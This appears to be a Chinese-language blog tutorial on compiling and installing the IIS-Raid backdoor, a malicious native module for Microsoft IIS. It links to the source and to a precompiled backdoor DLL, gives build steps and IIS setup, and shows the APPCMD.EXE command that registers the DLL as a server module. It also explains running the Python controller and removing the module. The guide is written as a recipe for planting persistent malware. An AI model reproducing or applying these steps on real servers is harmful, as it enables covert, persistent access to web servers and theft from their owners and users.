IIS RAID 后门

环境：

Windows Server 2012 64位 Standard 

IIS 8.0

visual studio 2015(推荐2019)


参考：
https://www.freebuf.com/sectool/231973.html



编译完的DLL：
https://github.com/ygwlgGiao/iis-raid-backdoor/blob/master/IIS-Backdoor.dll

环境的配置

1. 编译DLL文件

1.1 下载并且安装visual studio 2015

1.2 下载源码 https://github.com/0x09AL/IIS-Raid

1.3 打开visual studio， "文件"->"打开"->"项目/解决方案"。找到下载的源码的位置，选中module目录下的IIS-Backdoor.vcxproj文件。

1.4 导入之后，查看控制台消息。

warning  : 无法找到 v142 的生成工具。安装 v142 可使用 v142 生成工具进行生成。

原因：这是因为VS 2015没有V142，所以建议用VS 2019。

解决办法："项目"->"属性"。右侧有个"平台工具集选项"，选择visual studio 2015(V140)，应用。

1.5 选择 "release"，"X64"。右键项目名字，点击生成/

1.6 在源码的文件夹下，我们可以找到生成的DLL文件

2.IIS的安装

2.1 安装 Windows server 2012 64位，贴个图 

2.2 打开 服务器管理器，点击"添加角色和功能"。

2.3
开始之前： "下一步"
安装类型： "下一步"
服务器选择： "下一步"
服务器角色："Web服务器(IIS)"->"添加功能"->"下一步"
功能： ".NET Framework 3.5"->"下一步"
Web 服务器角色(IIS)："下一步"
角色服务：只勾选 "应用程序开发"的"CGI"->"下一步"
确认："安装"即可

过一段时间就完成了。

2.4 安装完成后，访问127.0.0.1:80就可以看到IIS的界面

后门的安装

1. 把编译好的IIS-Backdoor.dll文件放到c盘目录下，打开powershell

2. 添加模块
PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module  /image:"c:\IIS-Backdoor.dll" /add:true

3. 运行python脚本，对于中文系统来说，有几处编码问题修改一下。

iis_controller.py第64行，编码utf-8改为gb2312。

效果图：

另外一些模块有关的命令

看一下已经安装的模块
PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE list modules

删除已经安装的模块

PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE uninstall modules Module